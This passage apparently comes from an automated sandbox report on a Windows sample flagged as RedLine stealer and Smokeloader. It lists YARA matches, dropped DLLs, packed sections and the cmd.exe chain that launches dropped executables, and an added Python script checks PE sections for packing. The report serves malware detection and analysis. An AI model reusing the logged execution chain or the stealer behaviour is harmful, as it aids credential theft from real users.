Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD850 0_2_6C5AD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CF070 0_2_6C5CF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597810 0_2_6C597810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CB820 0_2_6C5CB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D4820 0_2_6C5D4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F50C7 0_2_6C5F50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC0E0 0_2_6C5AC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C58E0 0_2_6C5C58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B60A0 0_2_6C5B60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AA940 0_2_6C5AA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB970 0_2_6C5DB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB170 0_2_6C5FB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59D960 0_2_6C59D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5190 0_2_6C5C5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E2990 0_2_6C5E2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BD9B0 0_2_6C5BD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58C9A0 0_2_6C58C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C9A60 0_2_6C5C9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C8AC0 0_2_6C5C8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A1AF0 0_2_6C5A1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CE2F0 0_2_6C5CE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FBA90 0_2_6C5FBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59CAB0 0_2_6C59CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2AB0 0_2_6C5F2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5822A0 0_2_6C5822A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4AA0 0_2_6C5B4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C585340 0_2_6C585340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59C370 0_2_6C59C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD320 0_2_6C5CD320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F53C8 0_2_6C5F53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58F380 0_2_6C58F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AC60 0_2_6C63AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70AC30 0_2_6C70AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F6C00 0_2_6C6F6C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62ECC0 0_2_6C62ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68ECD0 0_2_6C68ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FED70 0_2_6C6FED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75AD50 0_2_6C75AD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B8D20 0_2_6C7B8D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7BCDC0 0_2_6C7BCDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C634DB0 0_2_6C634DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C6D90 0_2_6C6C6D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6CEE70 0_2_6C6CEE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C710E20 0_2_6C710E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AEC0 0_2_6C63AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D0EC0 0_2_6C6D0EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B6E90 0_2_6C6B6E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F2F70 0_2_6C6F2F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69EF40 0_2_6C69EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770F20 0_2_6C770F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636F10 0_2_6C636F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70EFF0 0_2_6C70EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C630FE0 0_2_6C630FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C778FB0 0_2_6C778FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63EFB0 0_2_6C63EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C704840 0_2_6C704840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C680820 0_2_6C680820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BA820 0_2_6C6BA820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7368E0 0_2_6C7368E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71C8C0 0_2_6C71C8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C668960 0_2_6C668960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C686900 0_2_6C686900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74C9E0 0_2_6C74C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6649F0 0_2_6C6649F0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5C94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5BCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7B09D0 appears 79 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Source: file.exe, 00000000.00000002.2443224125.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 48f0ec6733.exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: random[1].exe.0.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: enter[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: enter[1].exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: axplong.exe.5.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: axplong.exe.5.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: explorti.exe.8.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: axplong.exe.5.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
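The "ZLIB complexity" values above (0.994 to 0.9999 for the unnamed sections and for the random-named qzeqbxes / usoriijt sections of random[1].exe, enter[1].exe, axplong.exe and explorti.exe) are a packing indicator: section bytes that deflate cannot shrink are compressed or encrypted payload, not compiler output. The script below is an added example by the editor, not part of the Joe Sandbox report, and shows how to reproduce that check on any PE. It assumes the metric can be approximated as compressed size divided by raw size (the exact formula the sandbox uses is not stated on this page), and the PE image it analyses is constructed inline for the demo rather than being one of the dropped files.

```python
"""Added example (editor's code, not part of the Joe Sandbox report or any
project's code): parse a PE section table and compute a per-section 'ZLIB
complexity'. Assumption: the report's metric is approximated here as
len(zlib.compress(section_bytes)) / len(section_bytes); a value near 1.0 means
the bytes are incompressible, which for an unnamed section or one with a random
8-letter name (qzeqbxes, usoriijt) is a strong packing indicator. The PE image
below is constructed inline for the demo and is not a real sample."""
import random
import struct
import zlib

SCN_FLAGS = {          # only the IMAGE_SCN_* bits the report prints, plus WRITE
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
KNOWN_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
               ".edata", ".tls", ".bss", ".pdata", ".CRT"}


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio; an empty section scores 0 (nothing to pack)."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def pe_sections(image: bytes) -> list:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        off = table + 40 * i                       # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        data = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "raw_size": raw_size,
                         "flags": [v for k, v in SCN_FLAGS.items() if chars & k],
                         "complexity": zlib_complexity(data)})
    return sections


def flag_packed(sections: list, threshold: float = 0.99) -> list:
    """Sections that are near-incompressible AND either oddly named or W+X
    (a writable+executable section is where a packer unpacks in place)."""
    hits = []
    for s in sections:
        odd_name = s["name"] not in KNOWN_NAMES
        wx = {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= set(s["flags"])
        if s["complexity"] > threshold and (odd_name or wx):
            hits.append(s["name"])
    return hits


def build_pe(sections: list) -> bytes:
    """Constructed minimal PE32 (headers + sections, 0x200 file alignment);
    enough structure for pe_sections(), not a loadable binary."""
    align = 0x200
    first_raw = -(-(0x80 + 4 + 20 + 224 + 40 * len(sections)) // align) * align
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    table, body, raw_ptr = b"", b"", first_raw
    for name, data, chars in sections:
        raw_size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             raw_ptr, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return headers.ljust(first_raw, b"\0") + body


# Constructed contents: repetitive x86 prologue bytes vs. seeded pseudo-random bytes.
TEXT_BYTES = b"\x55\x8b\xec\x83\xec\x10" * 512
_rng = random.Random(7)
PACKED_BYTES = bytes(_rng.getrandbits(8) for _ in range(4096))
SAMPLE_PE = build_pe([
    (".text", TEXT_BYTES, 0x60000020),       # CODE|EXECUTE|READ, as reported for file.exe
    ("qzeqbxes", PACKED_BYTES, 0xE0000020),  # random name, W+X, incompressible
    ("", PACKED_BYTES, 0xE0000040),          # unnamed data section, as in random[1].exe
])


def triage(image: bytes = SAMPLE_PE) -> dict:
    """Section listing plus the names flag_packed() singles out."""
    secs = pe_sections(image)
    return {"sections": secs, "packed": flag_packed(secs)}


if __name__ == "__main__":
    result = triage()
    for s in result["sections"]:
        print(f"{s['name'] or '<unnamed>':10} raw={s['raw_size']:#7x} "
              f"zlib={s['complexity']:.4f} {','.join(s['flags'])}")
    print("packed:", result["packed"])
```

Run it against a dropped file by passing the file's bytes to triage(); the threshold of 0.99 mirrors the values quoted in the report, and a .text section of real compiler output typically lands well below it. The name check matters as much as the ratio: a high-entropy .rsrc holding an icon or an embedded certificate is normal, whereas an unnamed or eight-random-letter section that is also writable and executable is the in-place unpacking stub the report's "changes PE section rights" signature reacts to.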
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@141/390@137/41
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5E7030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XJMWU3X2.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA3E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT OR IGNORE INTO index_data (index_id, value, object_data_key, object_store_id, value_locale) VALUES (:index_id, :value, :object_data_key, :object_store_id, :value_locale);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2120221543.0000000022C95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2104567912.0000000022C79000.00000004.00000020.00020000.00000000.sdmp, IEHCBAFIDAECBGCBFHJE.0.dr, CFIIIJJKJKFHIDGDBAKJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: RoamingCBFCFBFBFB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingIJDGCAEBFI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1048
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
